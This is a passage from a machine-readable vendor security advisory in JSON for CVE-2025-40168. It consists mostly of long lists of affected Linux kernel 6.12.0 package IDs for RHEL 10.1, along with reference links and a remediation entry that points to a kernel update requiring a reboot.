"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-40168"
},
{
"category": "external",
"summary": "RHBZ#2414482",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2414482"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-40168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40168"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-40168",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40168"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025111256-CVE-2025-40168-bdd5@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025111256-CVE-2025-40168-bdd5@gregkh/T"
}
],
"release_date": "2025-11-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-25T02:10:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
